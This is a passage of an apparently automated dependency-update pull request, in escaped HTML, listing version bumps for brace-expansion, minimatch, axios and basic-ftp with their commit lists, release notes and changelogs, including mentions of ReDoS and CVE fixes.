href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.1.2 to 3.1.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.1.2...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@octokit/plugin-paginate-rest`\n\nUpdates `axios` from 1.7.9 to 1.10.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eRelease v1.10.0\u003c/h2\u003e\n\u003ch2\u003eRelease notes:\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eadapter:\u003c/strong\u003e pass fetchOptions to fetch function (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6883\"\u003e#6883\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/0f50af8e076b7fb403844789bd5e812dedcaf4ed\"\u003e0f50af8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eform-data:\u003c/strong\u003e convert boolean values to strings in FormData serialization (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6917\"\u003e#6917\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/5064b108de336ff34862650709761b8a96d26be0\"\u003e5064b10\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003epackage:\u003c/strong\u003e add module entry point for React Native; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6933\"\u003e#6933\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/3d343b86dc4fd0eea0987059c5af04327c7ae304\"\u003e3d343b8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e improved fetchOptions interface (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6867\"\u003e#6867\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/63f1fce233009f5db1abf2586c145825ac98c3d7\"\u003e63f1fce\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/DigitalBrainJS\" title=\"+30/-19 ([#6933](https://github.com/axios/axios/issues/6933) [#6920](https://github.com/axios/axios/issues/6920) [#6893](https://github.com/axios/axios/issues/6893) [#6892](https://github.com/axios/axios/issues/6892) )\"\u003eDmitriy Mozgovoy\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/noritaka1166\" title=\"+2/-6 ([#6922](https://github.com/axios/axios/issues/6922) [#6923](https://github.com/axios/axios/issues/6923) )\"\u003eNoritaka Kobayashi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/dimitry-lzs\" title=\"+4/-0 ([#6917](https://github.com/axios/axios/issues/6917) )\"\u003eDimitrios Lazanas\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/AdrianKnapp\" title=\"+2/-2 ([#6867](https://github.com/axios/axios/issues/6867) )\"\u003eAdrian Knapp\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/howiezhao\" title=\"+3/-1 ([#6872](https://github.com/axios/axios/issues/6872) )\"\u003eHowie Zhao\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/warpdev\" title=\"+1/-1 ([#6883](https://github.com/axios/axios/issues/6883) )\"\u003eUhyeon Park\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/stscoundrel\" title=\"+1/-1 ([#6913](https://github.com/axios/axios/issues/6913) )\"\u003eSampo Silvennoinen\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eRelease v1.9.0\u003c/h2\u003e\n\u003ch2\u003eRelease notes:\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fix the Axios constructor implementation to treat the config argument as optional; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6881\"\u003e#6881\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/6c5d4cd69286868059c5e52d45085cb9a894a983\"\u003e6c5d4cd\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003efetch:\u003c/strong\u003e fixed ERR_NETWORK mapping for Safari browsers; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6767\"\u003e#6767\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/dfe8411c9a082c3d068bdd1f8d6e73054f387f45\"\u003edfe8411\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e allow iterable objects to be a data source for the set method; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6873\"\u003e#6873\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/1b1f9ccdc15f1ea745160ec9a5223de9db4673bc\"\u003e1b1f9cc\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e fix \u003ccode\u003egetSetCookie\u003c/code\u003e by using 'get' method for caseless access; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6874\"\u003e#6874\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/d4f7df4b304af8b373488fdf8e830793ff843eb9\"\u003ed4f7df4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e fixed support for setting multiple header values from an iterated source; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6885\"\u003e#6885\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/f7a3b5e0f7e5e127b97defa92a132fbf1b55cf15\"\u003ef7a3b5e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ehttp:\u003c/strong\u003e send minimal end multipart boundary (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6661\"\u003e#6661\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/987d2e2dd3b362757550f36eab875e60640b6ddc\"\u003e987d2e2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e fix autocomplete for adapter config (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6855\"\u003e#6855\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/e61a8934d8f94dd429a2f309b48c67307c700df0\"\u003ee61a893\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAxiosHeaders:\u003c/strong\u003e add getSetCookie method to retrieve set-cookie headers values (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5707\"\u003e#5707\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/80ea756e72bcf53110fa792f5d7ab76e8b11c996\"\u003e80ea756\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/DigitalBrainJS\" title=\"+200/-34 ([#6890](https://github.com/axios/axios/issues/6890) [#6889](https://github.com/axios/axios/issues/6889) [#6888](https://github.com/axios/axios/issues/6888) [#6885](https://github.com/axios/axios/issues/6885) [#6881](https://github.com/axios/axios/issues/6881) [#6767](https://github.com/axios/axios/issues/6767) [#6874](https://github.com/axios/axios/issues/6874) [#6873](https://github.com/axios/axios/issues/6873) )\"\u003eDmitriy Mozgovoy\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/jasonsaayman\" title=\"+26/-1 ()\"\u003eJay\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/WillianAgostini\" title=\"+21/-0 ([#5707](https://github.com/axios/axios/issues/5707) )\"\u003eWillian Agostini\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Gerhut\" title=\"+3/-3 ([#5096](https://github.com/axios/axios/issues/5096) )\"\u003eGeorge Cheng\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/FatahChan\" title=\"+2/-2 ([#6855](https://github.com/axios/axios/issues/6855) )\"\u003eFatahChan\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/igstan\" title=\"+1/-1 ([#6661](https://github.com/axios/axios/issues/6661) )\"\u003eIonuț G. Stan\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eRelease v1.8.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.9.0...v1.10.0\"\u003e1.10.0\u003c/a\u003e (2025-06-14)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eadapter:\u003c/strong\u003e pass fetchOptions to fetch function (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6883\"\u003e#6883\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/0f50af8e076b7fb403844789bd5e812dedcaf4ed\"\u003e0f50af8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eform-data:\u003c/strong\u003e convert boolean values to strings in FormData serialization (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6917\"\u003e#6917\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/5064b108de336ff34862650709761b8a96d26be0\"\u003e5064b10\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003epackage:\u003c/strong\u003e add module entry point for React Native; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6933\"\u003e#6933\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/3d343b86dc4fd0eea0987059c5af04327c7ae304\"\u003e3d343b8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e improved fetchOptions interface (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6867\"\u003e#6867\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/63f1fce233009f5db1abf2586c145825ac98c3d7\"\u003e63f1fce\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/DigitalBrainJS\" title=\"+30/-19 ([#6933](https://github.com/axios/axios/issues/6933) [#6920](https://github.com/axios/axios/issues/6920) [#6893](https://github.com/axios/axios/issues/6893) [#6892](https://github.com/axios/axios/issues/6892) )\"\u003eDmitriy Mozgovoy\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/noritaka1166\" title=\"+2/-6 ([#6922](https://github.com/axios/axios/issues/6922) [#6923](https://github.com/axios/axios/issues/6923) )\"\u003eNoritaka Kobayashi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/dimitry-lzs\" title=\"+4/-0 ([#6917](https://github.com/axios/axios/issues/6917) )\"\u003eDimitrios Lazanas\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/AdrianKnapp\" title=\"+2/-2 ([#6867](https://github.com/axios/axios/issues/6867) )\"\u003eAdrian Knapp\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/howiezhao\" title=\"+3/-1 ([#6872](https://github.com/axios/axios/issues/6872) )\"\u003eHowie Zhao\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/warpdev\" title=\"+1/-1 ([#6883](https://github.com/axios/axios/issues/6883) )\"\u003eUhyeon Park\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/stscoundrel\" title=\"+1/-1 ([#6913](https://github.com/axios/axios/issues/6913) )\"\u003eSampo Silvennoinen\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.8.4...v1.9.0\"\u003e1.9.0\u003c/a\u003e (2025-04-24)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fix the Axios constructor implementation to treat the config argument as optional; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6881\"\u003e#6881\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/6c5d4cd69286868059c5e52d45085cb9a894a983\"\u003e6c5d4cd\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003efetch:\u003c/strong\u003e fixed ERR_NETWORK mapping for Safari browsers; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6767\"\u003e#6767\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/dfe8411c9a082c3d068bdd1f8d6e73054f387f45\"\u003edfe8411\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e allow iterable objects to be a data source for the set method; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6873\"\u003e#6873\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/1b1f9ccdc15f1ea745160ec9a5223de9db4673bc\"\u003e1b1f9cc\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e fix \u003ccode\u003egetSetCookie\u003c/code\u003e by using 'get' method for caseless access; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6874\"\u003e#6874\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/d4f7df4b304af8b373488fdf8e830793ff843eb9\"\u003ed4f7df4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e fixed support for setting multiple header values from an iterated source; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6885\"\u003e#6885\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/f7a3b5e0f7e5e127b97defa92a132fbf1b55cf15\"\u003ef7a3b5e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ehttp:\u003c/strong\u003e send minimal end multipart boundary (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6661\"\u003e#6661\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/987d2e2dd3b362757550f36eab875e60640b6ddc\"\u003e987d2e2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e fix autocomplete for adapter config (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6855\"\u003e#6855\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/e61a8934d8f94dd429a2f309b48c67307c700df0\"\u003ee61a893\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAxiosHeaders:\u003c/strong\u003e add getSetCookie method to retrieve set-cookie headers values (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5707\"\u003e#5707\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/80ea756e72bcf53110fa792f5d7ab76e8b11c996\"\u003e80ea756\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/DigitalBrainJS\" title=\"+200/-34 ([#6890](https://github.com/axios/axios/issues/6890) [#6889](https://github.com/axios/axios/issues/6889) [#6888](https://github.com/axios/axios/issues/6888) [#6885](https://github.com/axios/axios/issues/6885) [#6881](https://github.com/axios/axios/issues/6881) [#6767](https://github.com/axios/axios/issues/6767) [#6874](https://github.com/axios/axios/issues/6874) [#6873](https://github.com/axios/axios/issues/6873) )\"\u003eDmitriy Mozgovoy\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/jasonsaayman\" title=\"+26/-1 ()\"\u003eJay\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/WillianAgostini\" title=\"+21/-0 ([#5707](https://github.com/axios/axios/issues/5707) )\"\u003eWillian Agostini\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Gerhut\" title=\"+3/-3 ([#5096](https://github.com/axios/axios/issues/5096) )\"\u003eGeorge Cheng\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/FatahChan\" title=\"+2/-2 ([#6855](https://github.com/axios/axios/issues/6855) )\"\u003eFatahChan\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/igstan\" title=\"+1/-1 ([#6661](https://github.com/axios/axios/issues/6661) )\"\u003eIonuț G. Stan\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.8.3...v1.8.4\"\u003e1.8.4\u003c/a\u003e (2025-03-19)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/73a836dae75f06055c24561d83cf4ca1c43e2854\"\u003e\u003ccode\u003e73a836d\u003c/code\u003e\u003c/a\u003e chore(release): v1.10.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6943\"\u003e#6943\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/3d343b86dc4fd0eea0987059c5af04327c7ae304\"\u003e\u003ccode\u003e3d343b8\u003c/code\u003e\u003c/a\u003e fix(package): add module entry point for React Native; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6933\"\u003e#6933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/0f50af8e076b7fb403844789bd5e812dedcaf4ed\"\u003e\u003ccode\u003e0f50af8\u003c/code\u003e\u003c/a\u003e fix(adapter): pass fetchOptions to fetch function (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6883\"\u003e#6883\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/ee7799e13c0783c0fdfa656613bb1af6f5e53ccd\"\u003e\u003ccode\u003eee7799e\u003c/code\u003e\u003c/a\u003e refactor: remove unused import in test (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6922\"\u003e#6922\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/eb0a2db04beda089e6bdcb2820f193ed2faecbc3\"\u003e\u003ccode\u003eeb0a2db\u003c/code\u003e\u003c/a\u003e chore: fix typos in test (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6923\"\u003e#6923\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/7d551393c384e58058e04ae954c4cfd929afcd64\"\u003e\u003ccode\u003e7d55139\u003c/code\u003e\u003c/a\u003e docs(readme): improve error descriptions; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6920\"\u003e#6920\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/f4fc6b8564ab794e67b4d1147167f2ecfc3557a3\"\u003e\u003ccode\u003ef4fc6b8\u003c/code\u003e\u003c/a\u003e chore(sponsor): update sponsor block (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/5064b108de336ff34862650709761b8a96d26be0\"\u003e\u003ccode\u003e5064b10\u003c/code\u003e\u003c/a\u003e fix(form-data): convert boolean values to strings in FormData serialization (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/c7e0fea78716e86694d5023f8f17d174bf064e8a\"\u003e\u003ccode\u003ec7e0fea\u003c/code\u003e\u003c/a\u003e CI: add Node 24 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6913\"\u003e#6913\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/7ba895c8874f3fdc4e9da992b2b9e34fe5a25b55\"\u003e\u003ccode\u003e7ba895c\u003c/code\u003e\u003c/a\u003e chore(sponsor): update sponsor block (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6907\"\u003e#6907\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v1.7.9...v1.10.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `basic-ftp` from 5.0.5 to 5.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/patrickjuchli/basic-ftp/releases\"\u003ebasic-ftp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.2.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanged: Skip files with invalid name in downloadToDir.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded: Add the option to prevent the use of separate transfer host IPs when using PASV. (\u003ca href=\"https://redirect.github.com/patrickjuchli/basic-ftp/issues/259\"\u003e#259\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/patrickjuchli/basic-ftp/blob/master/CHANGELOG.md\"\u003ebasic-ftp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.2.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanged: Skip files with invalid name in downloadToDir. Fixes security vulnerability CVE-2026-27699, see \u003ca href=\"https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-5rq4-664w-9x2c\"\u003ehttps://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-5rq4-664w-9x2c\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded: Add the option to prevent the use of separate transfer host IPs when using PASV. (\u003ca href=\"https://redirect.github.com/patrickjuchli/basic-ftp/issues/259\"\u003e#259\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 